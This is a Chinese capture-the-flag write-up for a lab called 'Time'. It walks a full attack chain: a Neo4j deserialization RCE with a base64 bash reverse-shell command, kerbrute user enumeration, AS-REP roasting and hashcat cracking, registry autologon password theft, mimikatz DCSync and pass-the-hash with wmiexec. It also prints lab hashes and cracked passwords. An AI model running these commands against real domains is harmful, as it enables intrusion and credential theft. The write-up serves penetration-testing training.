Time
靶标介绍:
Time是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
fscan先全端口扫一遍
.\fscan64.exe -h 39.98.236.66 -p 1-65535
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.236.66 is alive
[*] Icmp alive hosts len is: 1
39.98.236.66:22 open
39.98.236.66:1337 open
39.98.236.66:7473 open
39.98.236.66:7474 open
39.98.236.66:7687 open
39.98.236.66:36731 open
[*] alive ports len is: 6
start vulscan
已完成 0/6 [-] ssh 39.98.236.66:22 root 123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported me
thods remain
已完成 0/6 [-] webtitle https://39.98.236.66:1337 Get "https://39.98.236.66:1337": EOF
[*] WebTitle: https://39.98.236.66:7687 code:400 len:50 title:None
[*] WebTitle: http://39.98.236.66:7474 code:303 len:0 title:None 跳转url: http://39.98.236.66:7474/browser/
[*] WebTitle: https://39.98.236.66:7473 code:303 len:0 title:None 跳转url: https://39.98.236.66:7473/browser/
[*] WebTitle: http://39.98.236.66:7474/browser/ code:200 len:3279 title:Neo4j Browser
[*] WebTitle: https://39.98.236.66:7473/browser/ code:200 len:3279 title:Neo4j Browser
已完成 6/6
[*] 扫描结束,耗时: 4m28.3387393s有个neo4j的接口,版本为:Neo4j Browser version: 4.0.6,搜索查到存在rce
https://github.com/zwjjustdoit/CVE-2021-34371.jar
java -jar rhino_gadget.jar rmi://39.98.236.25:1337 "bash -c {echo,xxx}|{base64,-d}|{bash,-i}"
上线后找到第一个flag
内网代理+fscan,结果:
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.0
start infoscan
已完成 0/0 listen ip4:icmp 0.0.0.0: socket: operation not permitted
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12 is alive
(icmp) Target 172.22.6.25 is alive
(icmp) Target 172.22.6.36 is alive
(icmp) Target 172.22.6.38 is alive
[*] Icmp alive hosts len is: 4
172.22.6.25:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.12:135 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.36:7687 open
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.12:88 open
[*] alive ports len is: 11
start vulscan
[+] NetInfo:
[*]172.22.6.12
[->]DC-PROGAME
[->]172.22.6.12
[*] 172.22.6.12 (Windows Server 2016 Datacenter 14393)
[*] 172.22.6.25 XIAORANG\WIN2019
[+] NetInfo:
[*]172.22.6.25
[->]WIN2019
[->]172.22.6.25
[*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.6.38 code:200 len:1531 title:后台登录
[*] WebTitle:https://172.22.6.36:7687 code:400 len:50 title:None
已完成 11/11
[*] 扫描结束,耗时: 15.839546699s发现只有个后台可能有东西打打,存在sql注入,找一下账号密码(过程略,反正sqlmap就能跑)
随便发现第二个flag
然后user表,再结合第一个flag的hint,可以想到需要爆破Kerberos
工具:ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing (github.com)
命令:./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab user_name.txt -t 10
结果:
<-dc 172.22.6.12 -d xiaorang.lab user_name.txt -t 10
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/09/23 - Ronnie Flathers @ropnop
2023/04/09 16:02:01 > Using KDC(s):
2023/04/09 16:02:01 > 172.22.6.12:88
2023/04/09 16:02:01 > [+] VALID USERNAME: weixian@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: gaiyong@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: wengbang@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: shuzhen@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: xiqidi@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: yuanchang@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: xuanjiang@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: lvhui@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: wenbo@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: zhenjun@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: jinqing@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: yangju@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: weicheng@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: weixian@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: haobei@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: jizhen@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: jingze@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: zhaoxiu@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: liangliang@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: tangshun@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: rubao@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: xiyi@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: chebin@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: jicheng@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: chouqian@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: qiyue@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: beijin@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: chenghui@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: yanglang@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: pengyuan@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: jihuan@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: fusong@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: gaijin@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: duanmuxiao@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: dongcheng@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: tangrong@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: zhufeng@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: luwan@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: hongzhi@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: lianhuangchen@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: lili@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: rangsibo@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: yifu@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: wohua@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: haoguang@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: huabi@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: wenshao@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: langying@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: diaocai@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: lianggui@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: manxue@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: baqin@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: wenbiao@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: maqun@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: chengqiu@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: louyou@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: weishengshan@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: chuyuan@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: wenliang@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: yulvxue@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: pangzhen@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: luyue@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: ganjian@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: lezhong@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: guohong@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: hongqun@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: sheweiyue@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: lidongjin@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: yexing@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: dujian@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: maoda@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: qiaomei@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: zhangxin@xiaorang.lab
2023/04/09 16:02:01 > [+] VALID USERNAME: ganjian@xiaorang.lab提取下数据:
weixian@xiaorang.lab
gaiyong@xiaorang.lab
wengbang@xiaorang.lab
shuzhen@xiaorang.lab
xiqidi@xiaorang.lab
yuanchang@xiaorang.lab
xuanjiang@xiaorang.lab
lvhui@xiaorang.lab
wenbo@xiaorang.lab
zhenjun@xiaorang.lab
jinqing@xiaorang.lab
yangju@xiaorang.lab
weicheng@xiaorang.lab
haobei@xiaorang.lab
jizhen@xiaorang.lab
jingze@xiaorang.lab
zhaoxiu@xiaorang.lab
liangliang@xiaorang.lab
tangshun@xiaorang.lab
rubao@xiaorang.lab
xiyi@xiaorang.lab
chebin@xiaorang.lab
jicheng@xiaorang.lab
chouqian@xiaorang.lab
qiyue@xiaorang.lab
beijin@xiaorang.lab
chenghui@xiaorang.lab
yanglang@xiaorang.lab
pengyuan@xiaorang.lab
jihuan@xiaorang.lab
fusong@xiaorang.lab
gaijin@xiaorang.lab
duanmuxiao@xiaorang.lab
dongcheng@xiaorang.lab
tangrong@xiaorang.lab
zhufeng@xiaorang.lab
luwan@xiaorang.lab
hongzhi@xiaorang.lab
lianhuangchen@xiaorang.lab
lili@xiaorang.lab
rangsibo@xiaorang.lab
yifu@xiaorang.lab
wohua@xiaorang.lab
haoguang@xiaorang.lab
huabi@xiaorang.lab
wenshao@xiaorang.lab
langying@xiaorang.lab
diaocai@xiaorang.lab
lianggui@xiaorang.lab
manxue@xiaorang.lab
baqin@xiaorang.lab
wenbiao@xiaorang.lab
maqun@xiaorang.lab
chengqiu@xiaorang.lab
louyou@xiaorang.lab
weishengshan@xiaorang.lab
chuyuan@xiaorang.lab
wenliang@xiaorang.lab
yulvxue@xiaorang.lab
pangzhen@xiaorang.lab
luyue@xiaorang.lab
ganjian@xiaorang.lab
lezhong@xiaorang.lab
guohong@xiaorang.lab
hongqun@xiaorang.lab
sheweiyue@xiaorang.lab
lidongjin@xiaorang.lab
yexing@xiaorang.lab
dujian@xiaorang.lab
maoda@xiaorang.lab
qiaomei@xiaorang.lab
zhangxin@xiaorang.lab
ganjian@xiaorang.lab然后用GetNPUsers.py提取 Windows 网络中的用户列表。列出存在但不需要NTLM密码的用户,找到以下两个用户
$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:bd28d123b9d8f6e8f9cf426ca2daedf9$5f87bc7ec503e4b65e7c72f326449bf45f6b677c08445617a7616dc49a07151b2f4466beda6f54af8826d1f12a787ae9664111e43b2f90183cb518218a4f3339948823637d34f7c9f999e0105f46adc51cc59a50513802ef814bc7aa81087c97ffc1ff6d14a9b989a43bac16ec1a01e8466e9a83cb77014d97f86fc8ccf31d688aaed4b4fd5747c15519ef80bbfabbf42a94908d305d139b2c5f535391cf72b928fbc94aa9003d5c60480074497cb5c34874a1a32cb5b9cca201be8cac2a54e09426deff0126de8941698ea3a153a8a8bfea8aa7f6c718c814db167ec95d5b3878d78afc16095ff450569920
$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:4e26f7a6d2668e775ccad0a50ea9f757$f8d8f9e1e229619f4471a561147ad688a6b6f2193ab54f1ddefe1c58cb45e40222aeb681d58d234805418d9093cde036538fe61f39ce059d3ee0c188c9cb586b8201935aea0ae3b41f27f7718dce461b958f686f712275bf7dec79f576cbe020b724fcc04d754ec2609321a89fe968742485991b46b4d46e03c23249230c773616a6437d827575abde7ef68e7483987b7de1afb9bc57e0eab0a14ecefc478d7169105a62bbd767f48d0aeb6e4427416bad83cac847b9d826dbb12201aa5e6c8642c966300fb01cc27d605487a908c1002cdee0b1962a39e82ab32c60fc421573b26d3546e76ca94dcbec7a8ahashcat解密:
hashcat -m 18200 --force -a 0 'xxx' rockyou.txt
结果爆破出密码:
zhangxin/strawberry
wenshao/hellokitty
得到两个域用户权限
登录上172.22.6.25,用bloodhound分析
SharpHound.exe -c all
发现需要从win2019到yuxuan用户,只有个hassession提示,开机自启桌面,之后找到让 Windows 10 开机自动登录 | 骑士の物语 (yihuishou.github.io) ,在注册表找到密码
yuxuan/Yuxuan7QbrgZ3L
登录上后根据之前bloodhound存在sidhistory,直接打dsync提取凭证
.\mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user /all" "exit" > 11.txt
得到administrator哈希,用crackmapexec打哈希传递,得到第三个flag
wmiexec.py打dc得到最后一个flag
proxychains4 wmiexec.py -hashes 00000000000000000000000000000000:04d93ffd6f5f6e4490e0de23f240a5e9 Administrator@172.22.6.12 -codec gbk
